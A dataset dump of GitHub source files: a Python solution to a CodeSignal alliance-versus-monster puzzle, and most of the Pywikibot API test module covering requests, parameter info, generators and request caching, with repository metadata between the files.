"name": "JavaScript",
"bytes": "172643"
},
{
"name": "Perl",
"bytes": "31420"
},
{
"name": "Python",
"bytes": "1571632"
},
{
"name": "Shell",
"bytes": "3281"
}
],
"symlink_target": ""
} |
def allianceVersusMonster(health_points, attack_damage):
    """Return how many alliance soldiers survive the fight with the monster.

    Args:
        health_points: list whose index 0 is the monster's HP; the rest are
            the soldiers' HP.
        attack_damage: list whose index 0 is the monster's damage per hit;
            the rest are the soldiers' damage per hit.

    Returns:
        int: number of soldiers still alive when the monster dies, or 0 if
        the whole alliance is wiped out first.
    """
    monster_hp = health_points[0]
    monster_dm = attack_damage[0]
    # Pair each soldier's damage with its health: (damage, health).
    soldiers = list(zip(attack_damage[1:], health_points[1:]))
    # Strategy: the strongest soldier attacks repeatedly, stopping one hit
    # short of dying to the monster's counter-attacks; then the next
    # strongest, and so on.  Finally every soldier sacrifices one last
    # attack (dying to the counter-attack) until the monster falls or the
    # alliance is wiped out.
    soldiers = sorted(soldiers)[::-1]
    total = len(soldiers)
    soldier_idx = 0
    # Phase 1: trade blows only while the soldier survives the
    # counter-attack that follows each of its hits.
    while monster_hp > 0 and soldier_idx < len(soldiers):
        soldier_dm, soldier_hp = soldiers[soldier_idx]
        # Hits the soldier can land while surviving every counter-attack:
        # floor(hp / monster_dm), minus one when the division is exact
        # (that last counter-attack would be lethal).  Integer divmod
        # replaces the original float division, avoiding precision loss
        # on large values.
        times, remainder = divmod(soldier_hp, monster_dm)
        if remainder == 0 and times > 0:
            times -= 1
        monster_hp -= times * soldier_dm
        soldiers[soldier_idx] = (soldier_dm, soldier_hp - times * monster_dm)
        soldier_idx += 1
    # Phase 2: if the monster still stands, each surviving soldier lands
    # one final blow; the monster's counter-attack then kills that soldier
    # unless this blow finished the monster off.
    soldier_idx = 0
    while monster_hp > 0 and total > 0 and soldier_idx < len(soldiers):
        soldier_dm, soldier_hp = soldiers[soldier_idx]
        monster_hp -= soldier_dm
        # Only while the monster is still alive can it counter-attack.
        if (monster_hp > 0):
            total -= 1
        soldier_idx += 1
    return total
| {
"content_hash": "a53f20f0c20907157c21af75ba96325e",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 83,
"avg_line_length": 43.851063829787236,
"alnum_prop": 0.62882096069869,
"repo_name": "zubie7a/Algorithms",
"id": "3e1ac18210c46af8cefdbf955b3ece9749969ff6",
"size": "2130",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "CodeSignal/Challenges/MZ/01_Alliance_Versus_Monster.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "281393"
},
{
"name": "Perl",
"bytes": "75318"
},
{
"name": "Python",
"bytes": "289075"
}
],
"symlink_target": ""
} |
"""API test module."""
#
# (C) Pywikibot team, 2007-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
import datetime
import types
import pywikibot.data.api as api
import pywikibot.family
import pywikibot.login
import pywikibot.page
import pywikibot.site
from pywikibot.tools import (
MediaWikiVersion,
PY2,
UnicodeType,
)
from tests.aspects import (
unittest,
TestCase,
DefaultSiteTestCase,
DefaultDrySiteTestCase,
)
from tests.utils import allowed_failure, FakeLoginManager, PatchedHttp
if not PY2:
from urllib.parse import unquote_to_bytes
else:
from urllib import unquote_plus as unquote_to_bytes
class TestAPIMWException(DefaultSiteTestCase):
    """Test raising an APIMWException."""
    # Canned MediaWiki "internal error" payload returned by the patched
    # http layer; api.Request.submit must turn it into APIMWException.
    data = {'error': {'code': 'internal_api_error_fake',
                      'info': 'Fake error message'},
            'servedby': 'unittest',
            }
    def _dummy_request(self, **kwargs):
        # Fake http request handler: parse the outgoing request, verify it
        # contains every entry of self.assert_parameters, then return the
        # canned error payload.  Returning False means "do a real request";
        # that happens when the 'fake' marker parameter is absent.
        self.assertIn('body', kwargs)
        self.assertIn('uri', kwargs)
        self.assertIn('site', kwargs)
        if kwargs['body'] is None:
            # use uri and remove script path
            parameters = kwargs['uri']
            prefix = kwargs['site'].scriptpath() + '/api.php?'
            self.assertEqual(prefix, parameters[:len(prefix)])
            parameters = parameters[len(prefix):]
        else:
            parameters = kwargs['body']
        parameters = parameters.encode('ascii')  # it should be bytes anyway
        # Extract parameter data from the body, it's ugly but allows us
        # to verify that we actually test the right request
        parameters = [p.split(b'=', 1) for p in parameters.split(b'&')]
        keys = [p[0].decode('ascii') for p in parameters]
        values = [unquote_to_bytes(p[1]) for p in parameters]
        values = [v.decode(kwargs['site'].encoding()) for v in values]
        values = [v.replace('+', ' ') for v in values]
        # Multi-valued API parameters are pipe-separated; compare as sets.
        values = [set(v.split('|')) for v in values]
        parameters = dict(zip(keys, values))
        if 'fake' not in parameters:
            return False  # do an actual request
        if self.assert_parameters:
            for param, value in self.assert_parameters.items():
                self.assertIn(param, parameters)
                if value is not None:
                    if isinstance(value, UnicodeType):
                        value = value.split('|')
                    # Expected values must be a subset of what was sent.
                    self.assertLessEqual(set(value), parameters[param])
        return self.data
    def test_API_error(self):
        """Test a static request."""
        req = api.Request(site=self.site, parameters={'action': 'query',
                                                      'fake': True})
        # Static payload, no parameter verification.
        with PatchedHttp(api, self.data):
            self.assertRaises(api.APIMWException, req.submit)
    def test_API_error_encoding_ASCII(self):
        """Test a Page instance as parameter using ASCII chars."""
        page = pywikibot.page.Page(self.site, 'ASCII')
        req = api.Request(site=self.site, parameters={'action': 'query',
                                                      'fake': True,
                                                      'titles': page})
        self.assert_parameters = {'fake': ''}
        with PatchedHttp(api, self._dummy_request):
            self.assertRaises(api.APIMWException, req.submit)
    def test_API_error_encoding_Unicode(self):
        """Test a Page instance as parameter using non-ASCII chars."""
        page = pywikibot.page.Page(self.site, 'Ümlä üt')
        req = api.Request(site=self.site, parameters={'action': 'query',
                                                      'fake': True,
                                                      'titles': page})
        self.assert_parameters = {'fake': ''}
        with PatchedHttp(api, self._dummy_request):
            self.assertRaises(api.APIMWException, req.submit)
class TestApiFunctions(DefaultSiteTestCase):
    """API Request object test class."""
    def testObjectCreation(self):
        """Test api.Request() constructor with implicit site creation."""
        # Omitting the site argument must fall back to the default site.
        request = api.Request(parameters={'action': 'test', 'foo': '',
                                          'bar': 'test'})
        self.assertTrue(request)
        self.assertEqual(request.site, self.get_site())
class TestDryApiFunctions(DefaultDrySiteTestCase):
    """API Request object test class."""
    def testObjectCreation(self):
        """Test api.Request() constructor."""
        mysite = self.get_site()
        req = api.Request(site=mysite, parameters={'action': 'test', 'foo': '',
                                                   'bar': 'test'})
        self.assertTrue(req)
        self.assertEqual(req.site, mysite)
        self.assertIn("foo", req._params)
        # Scalar parameter values are normalised to single-element lists.
        self.assertEqual(req["bar"], ["test"])
        # test item assignment
        req["one"] = "1"
        self.assertEqual(req._params['one'], ["1"])
        # test compliance with dict interface
        # req.keys() should contain "action", "foo", "bar", "one"
        self.assertEqual(len(req.keys()), 4)
        self.assertIn("test", req._encoded_items().values())
        for item in req.items():
            self.assertEqual(len(item), 2, item)
    def test_mixed_mode(self):
        """Test if parameters is used with kwargs."""
        # 'parameters' given as a kwarg is treated as an ordinary API
        # parameter, same as putting it inside the parameters dict.
        req1 = api.Request(site=self.site, action='test', parameters='foo')
        self.assertIn('parameters', req1._params)
        req2 = api.Request(site=self.site, parameters={'action': 'test',
                                                       'parameters': 'foo'})
        self.assertEqual(req2['parameters'], ['foo'])
        self.assertEqual(req1._params, req2._params)
class TestParamInfo(DefaultSiteTestCase):
    """Test ParamInfo."""
    def test_init(self):
        """Test common initialization."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        # Nothing is fetched until _init() is called.
        self.assertEqual(len(pi), 0)
        pi._init()
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        # Older MediaWiki may preload extra modules; only check the exact
        # count on 1.12+.
        if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
            self.assertEqual(len(pi),
                             len(pi.preloaded_modules))
        self.assertIn('info', pi.query_modules)
        self.assertIn('login', pi._action_modules)
    def test_init_query_first(self):
        """Test init where it first adds query and then main."""
        def patched_generate_submodules(modules):
            # Change the query such that query is handled before main
            modules = set(modules)
            if 'main' in modules:
                assert 'query' in modules
                modules.discard('main')
                modules = list(modules) + ['main']
            else:
                assert 'query' not in modules
            original_generate_submodules(modules)
        pi = api.ParamInfo(self.site, set(['query', 'main']))
        self.assertEqual(len(pi), 0)
        original_generate_submodules = pi._generate_submodules
        pi._generate_submodules = patched_generate_submodules
        pi._init()
        self.assertIn('main', pi._paraminfo)
        self.assertIn('query', pi._paraminfo)
    def test_init_pageset(self):
        """Test initializing with only the pageset."""
        site = self.get_site()
        self.assertNotIn('query', api.ParamInfo.init_modules)
        pi = api.ParamInfo(site, set(['pageset']))
        # Requesting 'pageset' must not mutate the class-level defaults.
        self.assertNotIn('query', api.ParamInfo.init_modules)
        self.assertEqual(len(pi), 0)
        pi._init()
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        self.assertIn('pageset', pi._paraminfo)
        if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
            return
        # 'query' may or may not be pulled in as a dependency of 'pageset'.
        if 'query' in pi.preloaded_modules:
            self.assertIn('query', pi._paraminfo)
            self.assertEqual(len(pi), 4)
        else:
            self.assertNotIn('query', pi._paraminfo)
            self.assertEqual(len(pi), 3)
        self.assertEqual(len(pi),
                         len(pi.preloaded_modules))
        if MediaWikiVersion(site.version()) >= MediaWikiVersion("1.21"):
            # 'generator' was added to 'pageset' in 1.21
            generators_param = pi.parameter('pageset', 'generator')
            self.assertGreater(len(generators_param['type']), 1)
    def test_generators(self):
        """Test requesting the generator parameter."""
        site = self.get_site()
        pi = api.ParamInfo(site, set(['pageset', 'query']))
        self.assertEqual(len(pi), 0)
        pi._init()
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        self.assertIn('pageset', pi._paraminfo)
        self.assertIn('query', pi._paraminfo)
        if MediaWikiVersion(site.version()) >= MediaWikiVersion("1.21"):
            # 'generator' was added to 'pageset' in 1.21
            pageset_generators_param = pi.parameter('pageset', 'generator')
            query_generators_param = pi.parameter('query', 'generator')
            self.assertEqual(pageset_generators_param, query_generators_param)
    def test_with_module_info(self):
        """Test requesting the module info."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertEqual(len(pi), 0)
        pi.fetch(['info'])
        # Submodules are keyed by their full path ('query+info').
        self.assertIn('query+info', pi._paraminfo)
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
            self.assertEqual(len(pi),
                             1 + len(pi.preloaded_modules))
        self.assertEqual(pi['info']['prefix'], 'in')
        param = pi.parameter('info', 'prop')
        self.assertIsInstance(param, dict)
        self.assertEqual(param['name'], 'prop')
        self.assertNotIn('deprecated', param)
        self.assertIsInstance(param['type'], list)
        if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
            return
        self.assertIn('protection', param['type'])
    def test_with_module_revisions(self):
        """Test requesting the module revisions."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertEqual(len(pi), 0)
        pi.fetch(['revisions'])
        self.assertIn('query+revisions', pi._paraminfo)
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
            self.assertEqual(len(pi),
                             1 + len(pi.preloaded_modules))
        self.assertEqual(pi['revisions']['prefix'], 'rv')
        param = pi.parameter('revisions', 'prop')
        self.assertIsInstance(param, dict)
        self.assertEqual(param['name'], 'prop')
        self.assertNotIn('deprecated', param)
        self.assertIsInstance(param['type'], list)
        if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
            return
        self.assertIn('user', param['type'])
    def test_multiple_modules(self):
        """Test requesting multiple modules in one fetch."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertEqual(len(pi), 0)
        pi.fetch(['info', 'revisions'])
        self.assertIn('query+info', pi._paraminfo)
        self.assertIn('query+revisions', pi._paraminfo)
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
            return
        self.assertEqual(len(pi),
                         2 + len(pi.preloaded_modules))
    def test_with_invalid_module(self):
        """Test requesting different kind of invalid modules."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertEqual(len(pi), 0)
        # An unknown module is silently skipped, not stored.
        pi.fetch('foobar')
        self.assertNotIn('foobar', pi._paraminfo)
        self.assertRaises(KeyError, pi.__getitem__, 'foobar')
        self.assertRaises(KeyError, pi.__getitem__, 'foobar+foobar')
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
            return
        self.assertEqual(len(pi),
                         len(pi.preloaded_modules))
    def test_submodules(self):
        """Test another module apart from query having submodules."""
        pi = api.ParamInfo(self.site)
        self.assertFalse(pi._modules)
        pi.fetch(['query'])
        self.assertIn('query', pi._modules)
        self.assertIsInstance(pi._modules['query'], frozenset)
        self.assertIn('revisions', pi._modules['query'])
        self.assertEqual(pi.submodules('query'), pi.query_modules)
        # With path=True each entry is the 'query+<name>' form.
        for mod in pi.submodules('query', True):
            self.assertEqual(mod[:6], 'query+')
            self.assertEqual(mod[6:], pi[mod]['name'])
            self.assertEqual(mod, pi[mod]['path'])
        self.assertRaises(KeyError, pi.__getitem__, 'query+foobar')
        # 'edit' has no submodules.
        self.assertRaises(KeyError, pi.submodules, 'edit')
    def test_query_modules_with_limits(self):
        """Test query_modules_with_limits property."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertIn('revisions', pi.query_modules_with_limits)
        self.assertNotIn('info', pi.query_modules_with_limits)
    def test_modules(self):
        """Test v1.8 modules exist."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertIn('revisions', pi.modules)
        self.assertIn('help', pi.modules)
        self.assertIn('allpages', pi.modules)
        # modules yields bare names, never paths.
        for mod in pi.modules:
            self.assertNotIn('+', mod)
    def test_module_paths(self):
        """Test module paths use the complete paths."""
        pi = api.ParamInfo(self.site)
        self.assertIn('help', pi.module_paths)
        self.assertNotIn('revisions', pi.module_paths)
        self.assertIn('query+revisions', pi.module_paths)
        self.assertNotIn('allpages', pi.module_paths)
        self.assertIn('query+allpages', pi.module_paths)
    def test_prefixes(self):
        """Test v1.8 module prefixes exist."""
        site = self.get_site()
        pi = api.ParamInfo(site)
        self.assertIn('revisions', pi.prefixes)
        self.assertIn('login', pi.prefixes)
        self.assertIn('allpages', pi.prefixes)
    def test_prefix_map(self):
        """Test module prefixes use the path."""
        pi = api.ParamInfo(self.site)
        self.assertIn('query+revisions', pi.prefix_map)
        self.assertIn('login', pi.prefix_map)
        self.assertIn('query+allpages', pi.prefix_map)
        for mod in pi.prefix_map:
            self.assertEqual(mod, pi[mod]['path'])
    def test_attributes(self):
        """Test attributes method."""
        pi = api.ParamInfo(self.site)
        attributes = pi.attributes('mustbeposted')
        self.assertIn('edit', attributes)
        # 'mustbeposted' is a boolean flag: present with an empty value.
        for mod, value in attributes.items():
            self.assertEqual(mod, pi[mod]['path'])
            self.assertEqual(value, '')
    def test_old_mode(self):
        """Test the old mode explicitly."""
        site = self.get_site()
        pi = api.ParamInfo(site, modules_only_mode=False)
        pi.fetch(['info'])
        self.assertIn('query+info', pi._paraminfo)
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
            self.assertEqual(len(pi),
                             1 + len(pi.preloaded_modules))
        self.assertIn('revisions', pi.prefixes)
    def test_new_mode(self):
        """Test the new modules-only mode explicitly."""
        site = self.get_site()
        # The 'modules' parameter of action=paraminfo needs 1.25wmf4+.
        if MediaWikiVersion(site.version()) < MediaWikiVersion('1.25wmf4'):
            raise unittest.SkipTest(
                "version %s doesn't support the new paraminfo api"
                % site.version())
        pi = api.ParamInfo(site, modules_only_mode=True)
        pi.fetch(['info'])
        self.assertIn('query+info', pi._paraminfo)
        self.assertIn('main', pi._paraminfo)
        self.assertIn('paraminfo', pi._paraminfo)
        self.assertEqual(len(pi),
                         1 + len(pi.preloaded_modules))
        self.assertIn('revisions', pi.prefixes)
class TestOtherSubmodule(TestCase):
    """Test handling multiple different modules having submodules."""
    # mediawiki.org is used because it has the Flow extension enabled,
    # which provides a second module (besides query) with submodules.
    family = 'mediawiki'
    code = 'mediawiki'
    def test_other_submodule(self):
        """Test another module apart from query having submodules."""
        pi = api.ParamInfo(self.site)
        self.assertFalse(pi._modules)
        pi.fetch(['query'])
        self.assertNotIn('flow', pi._modules)
        pi.fetch(['flow'])
        self.assertIn('flow', pi._modules)
        # Collect every submodule name across all fetched parent modules.
        other_modules = set()
        for modules in pi._modules.values():
            self.assertIsInstance(modules, frozenset)
            other_modules |= modules
        # Whatever is neither an action nor a query module must belong to
        # flow, and must not collide with top-level module names.
        other_modules -= pi.action_modules
        other_modules -= pi.query_modules
        self.assertLessEqual(other_modules & pi.submodules('flow'),
                             pi.submodules('flow'))
        self.assertFalse(other_modules & pi.modules)
class TestParaminfoModules(DefaultSiteTestCase):
    """Test loading all paraminfo modules."""
    def test_action_modules(self):
        """Test loading all action modules."""
        paraminfo = self.site._paraminfo
        paraminfo.fetch(paraminfo.action_modules)
    def test_query_modules(self):
        """Test loading all query modules."""
        paraminfo = self.site._paraminfo
        paraminfo.fetch(paraminfo.query_modules)
class TestOptionSet(TestCase):
    """OptionSet class test class."""
    family = 'wikipedia'
    code = 'en'
    def test_non_lazy_load(self):
        """Test OptionSet with initialised site."""
        options = api.OptionSet(self.get_site(), 'recentchanges', 'show')
        # With a site bound, keys and values are validated immediately.
        self.assertRaises(KeyError, options.__setitem__, 'invalid_name', True)
        self.assertRaises(ValueError, options.__setitem__, 'anon', 'invalid_value')
        options['anon'] = True
        self.assertCountEqual(['anon'], options._enabled)
        self.assertEqual(set(), options._disabled)
        self.assertEqual(1, len(options))
        self.assertEqual(['anon'], list(options))
        self.assertEqual(['anon'], list(options.api_iter()))
        options['bot'] = False
        self.assertCountEqual(['anon'], options._enabled)
        self.assertCountEqual(['bot'], options._disabled)
        self.assertEqual(2, len(options))
        self.assertEqual(['anon', 'bot'], list(options))
        # Disabled options are emitted to the API with a '!' prefix.
        self.assertEqual(['anon', '!bot'], list(options.api_iter()))
        options.clear()
        self.assertEqual(set(), options._enabled)
        self.assertEqual(set(), options._disabled)
        self.assertEqual(0, len(options))
        self.assertEqual([], list(options))
        self.assertEqual([], list(options.api_iter()))
    def test_lazy_load(self):
        """Test OptionSet with delayed site initialisation."""
        options = api.OptionSet()
        # Without a site there is no validation yet, so any key is stored.
        options['invalid_name'] = True
        options['anon'] = True
        self.assertIn('invalid_name', options._enabled)
        self.assertEqual(2, len(options))
        # Binding a site validates stored keys and fails on the bad one...
        self.assertRaises(KeyError, options._set_site, self.get_site(),
                          'recentchanges', 'show')
        self.assertEqual(2, len(options))
        # ...unless clear_invalid=True, which silently drops it.
        options._set_site(self.get_site(), 'recentchanges', 'show', True)
        self.assertEqual(1, len(options))
        # A second binding of the same OptionSet is rejected.
        self.assertRaises(TypeError, options._set_site, self.get_site(),
                          'recentchanges', 'show')
class TestDryOptionSet(DefaultDrySiteTestCase):
    """OptionSet class test class."""
    def test_mutable_mapping(self):
        """Test keys, values and items from MutableMapping."""
        opts = api.OptionSet()
        opts['a'] = True
        opts['b'] = False
        opts['c'] = None
        # 'c' is None, i.e. unset, so it must not appear in any view.
        self.assertCountEqual(['a', 'b'], list(opts.keys()))
        self.assertCountEqual([True, False], list(opts.values()))
        self.assertEqual(set(), set(opts.values()) - set([True, False]))
        self.assertCountEqual([('a', True), ('b', False)], list(opts.items()))
class TestDryPageGenerator(TestCase):
    """Dry API PageGenerator object test class."""
    family = 'wikipedia'
    code = 'en'
    dry = True
    # api.py sorts 'pages' using the string key, which is not a
    # numeric comparison.
    titles = ("Broadcaster (definition)", "Wiktionary", "Broadcaster.com",
              "Wikipedia:Disambiguation")
    def setUp(self):
        """Set up test case."""
        super(TestDryPageGenerator, self).setUp()
        mysite = self.get_site()
        self.gen = api.PageGenerator(site=mysite,
                                     generator="links",
                                     titles="User:R'n'B")
        # following test data is copied from an actual api.php response,
        # but that query no longer matches this dataset.
        # http://en.wikipedia.org/w/api.php?action=query&generator=links&titles=User:R%27n%27B
        # Replace the request's submit() so no network access happens.
        self.gen.request.submit = types.MethodType(lambda self: {
            "query": {"pages": {"296589": {"pageid": 296589,
                                           "ns": 0,
                                           "title": "Broadcaster.com"
                                           },
                                "13918157": {"pageid": 13918157,
                                             "ns": 0,
                                             "title": "Broadcaster (definition)"
                                             },
                                "156658": {"pageid": 156658,
                                           "ns": 0,
                                           "title": "Wiktionary"
                                           },
                                "47757": {"pageid": 47757,
                                          "ns": 4,
                                          "title": "Wikipedia:Disambiguation"
                                          }
                                }
                      }
            }, self.gen.request)
        # On a dry site, the namespace objects only have canonical names.
        # Add custom_name for this site namespace, to match the live site.
        if 'Wikipedia' not in self.site.namespaces:
            self.site.namespaces[4].custom_name = 'Wikipedia'
            self.site.namespaces._namespace_names['wikipedia'] = self.site.namespaces[4]
    def test_results(self):
        """Test that PageGenerator yields pages with expected attributes."""
        self.assertPagelistTitles(self.gen, self.titles)
    def test_initial_limit(self):
        """Test the default limit."""
        self.assertEqual(self.gen.limit, None)  # limit is initally None
    def test_set_limit_as_number(self):
        """Test setting the limit using an int."""
        for i in range(-2, 4):
            self.gen.set_maximum_items(i)
            self.assertEqual(self.gen.limit, i)
    def test_set_limit_as_string(self):
        """Test setting the limit using an int cast into a string."""
        for i in range(-2, 4):
            self.gen.set_maximum_items(str(i))
            self.assertEqual(self.gen.limit, i)
    def test_set_limit_not_number(self):
        """Test setting the limit to not a number."""
        with self.assertRaisesRegex(
                ValueError,
                "invalid literal for int\(\) with base 10: 'test'"):
            self.gen.set_maximum_items('test')
    def test_limit_equal_total(self):
        """Test that PageGenerator yields the requested amount of pages."""
        self.gen.set_maximum_items(4)
        self.assertPagelistTitles(self.gen, self.titles)
    def test_limit_one(self):
        """Test that PageGenerator yields the requested amount of pages."""
        self.gen.set_maximum_items(1)
        self.assertPagelistTitles(self.gen, self.titles[0:1])
    def test_limit_zero(self):
        """Test that a limit of zero is the same as limit None."""
        self.gen.set_maximum_items(0)
        self.assertPagelistTitles(self.gen, self.titles)
    def test_limit_omit(self):
        """Test that limit omitted is the same as limit None."""
        self.gen.set_maximum_items(-1)
        self.assertPagelistTitles(self.gen, self.titles)
    def test_namespace(self):
        """Test PageGenerator set_namespace."""
        # A generator built from explicit titles may not be re-filtered
        # by namespace afterwards.
        self.assertRaises(AssertionError, self.gen.set_namespace, 0)
        self.assertRaises(AssertionError, self.gen.set_namespace, 1)
        self.assertRaises(AssertionError, self.gen.set_namespace, None)
class TestPropertyGenerator(TestCase):
"""API PropertyGenerator object test class."""
family = 'wikipedia'
code = 'en'
    def test_info(self):
        """Test PropertyGenerator with prop 'info'."""
        mainpage = self.get_mainpage()
        links = list(self.site.pagelinks(mainpage, total=10))
        titles = [l.title(withSection=False)
                  for l in links]
        gen = api.PropertyGenerator(site=self.site,
                                    prop="info",
                                    titles='|'.join(titles))
        # Every requested title must come back exactly once with the
        # 'info' properties attached.
        count = 0
        for pagedata in gen:
            self.assertIsInstance(pagedata, dict)
            self.assertIn('pageid', pagedata)
            self.assertIn('lastrevid', pagedata)
            count += 1
        self.assertEqual(len(links), count)
    def test_one_continuation(self):
        """Test PropertyGenerator with prop 'revisions'."""
        mainpage = self.get_mainpage()
        links = list(self.site.pagelinks(mainpage, total=10))
        titles = [l.title(withSection=False)
                  for l in links]
        gen = api.PropertyGenerator(site=self.site,
                                    prop="revisions",
                                    titles='|'.join(titles))
        gen.set_maximum_items(-1)  # suppress use of "rvlimit" parameter
        # Every requested title must come back once with revision data.
        count = 0
        for pagedata in gen:
            self.assertIsInstance(pagedata, dict)
            self.assertIn('pageid', pagedata)
            self.assertIn('revisions', pagedata)
            self.assertIn('revid', pagedata['revisions'][0])
            count += 1
        self.assertEqual(len(links), count)
def test_two_continuations(self):
"""Test PropertyGenerator with prop 'revisions' and 'coordinates'."""
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=10))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="revisions|coordinates",
titles='|'.join(titles))
gen.set_maximum_items(-1) # suppress use of "rvlimit" parameter
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
self.assertIn('revisions', pagedata)
self.assertIn('revid', pagedata['revisions'][0])
count += 1
self.assertEqual(len(links), count)
@allowed_failure
def test_many_continuations_limited(self):
"""Test PropertyGenerator with many limited props."""
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=30))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="revisions|info|categoryinfo|langlinks|templates",
rvprop="ids|flags|timestamp|user|comment|content",
titles='|'.join(titles))
# An APIError is raised if set_maximum_items is not called.
gen.set_maximum_items(-1) # suppress use of "rvlimit" parameter
# Force the generator into continuation mode
gen.set_query_increment(5)
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
count += 1
self.assertEqual(len(links), count)
# FIXME: AssertionError: 30 != 6150
@allowed_failure
def test_two_continuations_limited(self):
"""Test PropertyGenerator with many limited props and continuations."""
# FIXME: test fails
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=30))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="info|categoryinfo|langlinks|templates",
titles='|'.join(titles))
# Force the generator into continuation mode
gen.set_query_increment(5)
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
count += 1
self.assertEqual(len(links), count)
# FIXME: AssertionError: 30 != 11550
# FIXME: test disabled as it takes longer than 10 minutes
def _test_two_continuations_limited_long_test(self):
"""Long duration test, with total & step that are a real scenario."""
mainpage = self.get_mainpage()
links = list(mainpage.backlinks(total=300))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="info|categoryinfo|langlinks|templates",
titles='|'.join(titles))
# Force the generator into continuation mode
gen.set_query_increment(50)
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
count += 1
self.assertEqual(len(links), count)
class TestDryListGenerator(TestCase):

    """Test ListGenerator."""

    family = 'wikipedia'
    code = 'en'

    # Dry test: runs against a mocked site -- presumably no network access;
    # confirm with the test framework's handling of the `dry` flag.
    dry = True

    def setUp(self):
        """Set up test case."""
        super(TestDryListGenerator, self).setUp()
        mysite = self.get_site()
        # Inject minimal parameter metadata for the 'allpages' query module
        # so the generator can be constructed without a live server.
        mysite._paraminfo['query+allpages'] = {
            'prefix': 'ap',
            'limit': {'max': 10},
            'namespace': {'multi': True}
        }
        mysite._paraminfo.query_modules_with_limits = set(['allpages'])
        self.gen = api.ListGenerator(listaction="allpages", site=mysite)

    def test_namespace_none(self):
        """Test ListGenerator set_namespace with None."""
        self.assertRaises(TypeError, self.gen.set_namespace, None)

    def test_namespace_zero(self):
        """Test ListGenerator set_namespace with 0."""
        self.gen.set_namespace(0)
class TestCachedRequest(DefaultSiteTestCase):

    """Test API Request caching.

    This test class does not use the forced test caching.
    """

    cached = False

    def test_normal_use(self):
        """Test the caching of CachedRequest with an ordinary request."""
        mysite = self.get_site()
        mainpage = self.get_mainpage()
        # Issue the identical cached query three times: all results must be
        # equal, and the second and third requests must share a cache time.
        params = {'action': 'query',
                  'prop': 'info',
                  'titles': mainpage.title(),
                  }
        requests = []
        results = []
        for _ in range(3):
            request = api.CachedRequest(datetime.timedelta(minutes=10),
                                        site=mysite, parameters=params)
            requests.append(request)
            results.append(request.submit())
        self.assertEqual(results[0], results[1])
        self.assertEqual(results[1], results[2])
        self.assertIsNotNone(requests[1]._cachetime)
        self.assertIsNotNone(requests[2]._cachetime)
        self.assertEqual(requests[1]._cachetime, requests[2]._cachetime)

    def test_internals(self):
        """Test the caching of CachedRequest by faking a unique request."""
        mysite = self.get_site()
        # Query a missing page whose title is unique to this run, so the
        # first request cannot be served from cache but later ones can.
        now = datetime.datetime.now()
        params = {'action': 'query',
                  'prop': 'info',
                  'titles': 'TestCachedRequest_test_internals ' + str(now),
                  }
        request = api.CachedRequest(datetime.timedelta(minutes=10),
                                    site=mysite, parameters=params)
        loaded = request._load_cache()
        self.assertFalse(loaded)
        self.assertIsNone(request._data)
        self.assertIsNone(request._cachetime)
        fresh = request.submit()
        self.assertIsNotNone(request._data)
        self.assertIsNone(request._cachetime)
        loaded = request._load_cache()
        self.assertTrue(loaded)
        self.assertIsNotNone(request._data)
        self.assertIsNotNone(request._cachetime)
        self.assertGreater(request._cachetime, now)
        self.assertEqual(request._data, fresh)
class TestLazyLoginBase(TestCase):

    """
    Test that it tries to login when read API access is denied.

    Because there is no such family configured it creates an AutoFamily and
    BaseSite on its own. It's testing against steward.wikimedia.org.

    These tests are split into two subclasses as only the first failed login
    behaves as expected. All subsequent logins will raise an APIError, making
    it impossible to test two scenarios with the same APISite object.
    """

    hostname = 'steward.wikimedia.org'

    @classmethod
    def setUpClass(cls):
        """Set up steward Family."""
        super(TestLazyLoginBase, cls).setUpClass()
        # 'steward' is not a configured family, so build the family and
        # site objects at runtime.
